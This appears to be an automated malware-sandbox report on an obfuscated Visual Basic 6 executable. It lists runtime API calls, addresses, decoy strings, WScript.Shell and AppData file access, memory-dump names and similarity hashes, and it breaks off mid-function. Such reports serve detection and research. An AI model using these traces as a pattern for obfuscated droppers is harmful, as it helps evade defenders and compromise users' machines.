__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E6EC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041E708
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041E715
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041E721
#697.MSVBVM60(000009AE,?,00000000), ref: 0041E733
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041E73D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E74C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041E756
__vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E778
__vbaFreeObj.MSVBVM60(0041E796,?,00000000), ref: 0041E780
__vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E788
__vbaFreeStr.MSVBVM60(0041E796,?,00000000), ref: 0041E790

Strings

Gulsoterne, xrefs: 0041E6D0
Desorganisationens, xrefs: 0041E747
FolderExists, xrefs: 0041E6FC
Propreste7, xrefs: 0041E742
Scripting.FileSystemObject, xrefs: 0041E6A7

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 3723c0382a27267573c3fe806b053ee1ce9e4f9381be265413b1bdeb27e899bb
Instruction ID: 02a90346080b6d65794ca47e06d52b1e38554b1895dde0ef5aad230d2ce37d67
Opcode Fuzzy Hash: 3723c0382a27267573c3fe806b053ee1ce9e4f9381be265413b1bdeb27e899bb
Instruction Fuzzy Hash: 24313C71910218A7DB10EBA2CD86FEE7778BF01708F60453EB101770E1EBBD56458B58

Uniqueness

Uniqueness Score: -1.00%

Function 00420F4C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420F68
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420F95
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FAC
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FB1
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 00420FCA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FE1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FEA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FF4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 00420FFC
__vbaFreeStr.MSVBVM60(00421023,?,?,?,?,?,?,00401546), ref: 00421015
__vbaFreeObj.MSVBVM60(00421023,?,?,?,?,?,?,00401546), ref: 0042101D

Strings

WScript.Shell, xrefs: 00420FD8

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: 9ae9595ff67f969ff0b0e3e10281badd87c183c121a1a7f2c62277ae3b0ce00d
Instruction ID: eb16c35e6acd40f0e13e5f4b480fa3bd2579fd0ca9ac4f3a52b02e3c4c7057dd
Opcode Fuzzy Hash: 9ae9595ff67f969ff0b0e3e10281badd87c183c121a1a7f2c62277ae3b0ce00d
Instruction Fuzzy Hash: 06115EB1900208BBCB10EFA2DD46BDEBBB8EB04708F50456EF101771E1DB7D5A448B99

Uniqueness

Uniqueness Score: -1.00%

Function 00421036, Relevance: 15.1, APIs: 10, Instructions: 102COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421051
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042106A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402314,00000058), ref: 00421096
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004210B1
#644.MSVBVM60(?,?,?), ref: 004210BA
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004210CB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042110A
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042111B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402314,000002B0), ref: 00421152
__vbaFreeObj.MSVBVM60(00421179), ref: 00421173

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 9e3e3bcaed555255f90cbfb79cbad12f44f598c8d465e8b6702613a5947fb933
Instruction ID: cfd7f10f4326765af16ed6dd4e388d4e9dd2d1b1e363c786afdfca8b2c8dd650
Opcode Fuzzy Hash: 9e3e3bcaed555255f90cbfb79cbad12f44f598c8d465e8b6702613a5947fb933
Instruction Fuzzy Hash: EE414771900258AFDF01DF91CC46BDEBBB5FF09344F20442AFA01BB1A1D7B999468B98

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 004019CC, 00401888

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: f040c468f3a650f91f403cc4ee9c72371284282e98a4de4585c13c0afe7f240b
Instruction ID: 3475721fc5de6470c1ed97adcdd5b59bfb3067c989f60441c82283cf71b8c4e5
Opcode Fuzzy Hash: f040c468f3a650f91f403cc4ee9c72371284282e98a4de4585c13c0afe7f240b
Instruction Fuzzy Hash: 7A31966244E3C14FC3139BB45D756A17FB0AE63214B1A86EBC4D2CF0B3D228995AD367

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00420A6D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420A8B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AB5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AC0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420ACB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420AD6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420AE6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420AF0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00420B31
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420B55
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420B64
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00420B77
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420B96
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420BA0
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420BAF
__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420BB9
#513.MSVBVM60(?,00000008,000000EA), ref: 00420BE8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420BF1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420BFB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 00420C03
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00420C12
__vbaVarDup.MSVBVM60 ref: 00420C37
#542.MSVBVM60(?,?), ref: 00420C44
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00420C68
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00420C7E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420CA9
__vbaNew2.MSVBVM60(004025A0,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420CC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 00420D23
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420D7F
__vbaStrMove.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420DA9
__vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000110), ref: 00420DB1
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420DBE
__vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E0A
__vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E12
__vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E1A
__vbaFreeStr.MSVBVM60(00420E40,?,?,?,?,?,?,00401546), ref: 00420E22

Strings

Antagonistiske, xrefs: 00420C9A
12/12/12, xrefs: 00420C1A
Apokreos, xrefs: 00420BAA
DIVARICATE, xrefs: 00420DB6
ADDEDLY, xrefs: 00420C9F
Pollenate4, xrefs: 00420B91
Sjkler7, xrefs: 00420C95
monacanthid, xrefs: 00420B36
RESELLS, xrefs: 00420CA4

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: fc87b34e61862f3e923425ea6d11f632ca7021f03a237f4211496be39bfb7b82
Instruction ID: 9e22c763273cad41d478ff37d2696e063a43a040969f9efb5dc1aae6e23d41ff
Opcode Fuzzy Hash: fc87b34e61862f3e923425ea6d11f632ca7021f03a237f4211496be39bfb7b82
Instruction Fuzzy Hash: 8EA1E771E01218AFDB10EF91D886BDEB7B8BF04304F5081AAF505B71A1EB785A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F40E, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F42B
__vbaVarDup.MSVBVM60 ref: 0041F45A
#667.MSVBVM60(?), ref: 0041F463
__vbaStrMove.MSVBVM60(?), ref: 0041F46D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F478
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F48F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F497
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F4C8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F4D5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F4DE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F4E8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F4F7
__vbaNew2.MSVBVM60(004025A0,004223C0), ref: 0041F512
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041F574
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041F5CD
__vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000070), ref: 0041F5EF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F61F
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F635
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F656
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F663
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F67D
__vbaVarDup.MSVBVM60 ref: 0041F6AD
#522.MSVBVM60(?,?), ref: 0041F6BA
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F6C3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F6CD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F6DC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041F6E9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041F6EF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041F6F9
__vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F73D
__vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F745
__vbaFreeStr.MSVBVM60(0041F753,?,?,?,?,00401546), ref: 0041F74D

Strings

appdata, xrefs: 0041F43D
Langfredagene5, xrefs: 0041F4AB
galopbanernes, xrefs: 0041F6E4
f, xrefs: 0041F6FE
SUPERSERIOUS, xrefs: 0041F602
Skovede1, xrefs: 0041F690
Picry, xrefs: 0041F473

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: 643d0d9334024c9d47c50dfcf56e03dfeee1a403110a2155a8e72d0d46bc80bc
Instruction ID: e41becb712d6e9f7191228b7bf20ac305e8668c1b385e923c000365d7138cc6e
Opcode Fuzzy Hash: 643d0d9334024c9d47c50dfcf56e03dfeee1a403110a2155a8e72d0d46bc80bc
Instruction Fuzzy Hash: C981E972D00218AADB10EB91CD45FDEB7B9BF04304F5085AAE105B71A1EB785B89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F770, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F78D
__vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,00401546), ref: 0041F7B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,0000004C), ref: 0041F814
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402ECC,00000028), ref: 0041F866
__vbaFreeObj.MSVBVM60 ref: 0041F87D
#697.MSVBVM60(00003139), ref: 0041F887
__vbaStrMove.MSVBVM60(00003139), ref: 0041F891
#618.MSVBVM60(?,00000064,00003139), ref: 0041F89B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041F8A5
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8B0
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8C7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8EF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F8FC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F91B
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F921
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F92B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F93A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F942
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041F955
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041F965
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041F96C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041F977
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F980
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F98A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F992
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F99C
__vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9D6
__vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9DE
__vbaFreeStr.MSVBVM60(0041F9EC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9E6

Strings

appdata, xrefs: 0041F8DB
Rutiner, xrefs: 0041F997
Sciuroid8, xrefs: 0041F8AB
\qc17, xrefs: 0041F901

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: c69763984ed7b4e3ac494bddae3cdf9026df691943ab16383f2991c5f1a0908a
Instruction ID: 7c428f09ce7703e27237ff70277566373f65784c74b6a6c4de62ce841f798d38
Opcode Fuzzy Hash: c69763984ed7b4e3ac494bddae3cdf9026df691943ab16383f2991c5f1a0908a
Instruction Fuzzy Hash: C5510C71900218AEDB10EBA1CC46FDEB7B8AF04708F50417AF105B71E1DB785A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041E93A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041E956
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041E983
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E996
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9A6
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9B0
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9B8
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9C0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041E9C5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041E9CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402650,0000001C), ref: 0041E9FE
#613.MSVBVM60(?,00000003), ref: 0041EA21
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EA2A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EA34
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EA3C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EA4B
#574.MSVBVM60(00000003), ref: 0041EA65
__vbaStrMove.MSVBVM60(00000003), ref: 0041EA6F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA7A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA8D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EA95
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAA6
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAB0
__vbaNew2.MSVBVM60(004025A0,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EAC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014), ref: 0041EB15
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,00000068), ref: 0041EB56
__vbaFreeObj.MSVBVM60(00000000,?,004025B0,00000068), ref: 0041EB75
__vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBA7
__vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBAF
__vbaFreeStr.MSVBVM60(0041EBBD,INVALIDNESS,00000000,00000003), ref: 0041EBB7

Strings

INVALIDNESS, xrefs: 0041EA75
Flimflam, xrefs: 0041E9A1
Fribords2, xrefs: 0041E99C

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: d04e487ac84ff9532184497aa78f7e70fb8b61bc5d7d33464f59b40d53c6ee17
Instruction ID: 355c1c2ac91816339976770618c11783678ba40fc02f8777b14d40bb2027be04
Opcode Fuzzy Hash: d04e487ac84ff9532184497aa78f7e70fb8b61bc5d7d33464f59b40d53c6ee17
Instruction Fuzzy Hash: 05710875D00218AFDB00EBA6C885BDDBBB8BF08704F50812AF505BB1E1DB786A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EDE4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE01
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE19
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE24
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE31
#524.MSVBVM60(?,00004008), ref: 0041EE4B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EE66
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EE72
__vbaNew2.MSVBVM60(004025A0,004223C0,00008008,?,?,?,?,00004008), ref: 0041EE96
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EEE3
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF2A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF54
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF5C
__vbaNew2.MSVBVM60(004025A0,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF74
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402590,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041EFC1
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F001
#703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F01B
__vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F025
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025B0,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F054
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F06B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F073
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F07B
#536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F092
__vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F09C
__vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F0A4
__vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0DD
__vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0E5
__vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0ED
__vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0F5
__vbaFreeStr.MSVBVM60(0041F103,00000003,00008008,?,?,?,?,00004008), ref: 0041F0FD

Strings

Gurgledes, xrefs: 0041EE29
ICHTHYOPOLISM, xrefs: 0041EE50

Memory Dump Source

Source File: 00000002.00000002.107794384407.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.107794347939.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.107794581970.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.107794623126.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
String ID: Gurgledes$ICHTHYOPOLISM
API String ID: 2536202667-1995639141
Opcode ID: dde2ad451a0e109637174636e54121a6f31446d6cbbefaa9bf4267809e36ca7f
Instruction ID: 77930b54b084aa1f6d5c2f66190b20487ba8b70db1681777619c98ad140c7449
Opcode Fuzzy Hash: dde2ad451a0e109637174636e54121a6f31446d6cbbefaa9bf4267809e36ca7f
Instruction Fuzzy Hash: 07910571D00218EFDB10EFA5C985BDDBBB5BF09308F20816AE405B72A2DB785A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F11E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F13C
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F154
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F15F
__vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F16F
#564.MSVBVM60(00000004,?), ref: 0041F19C
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F1B6
__vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F1D5
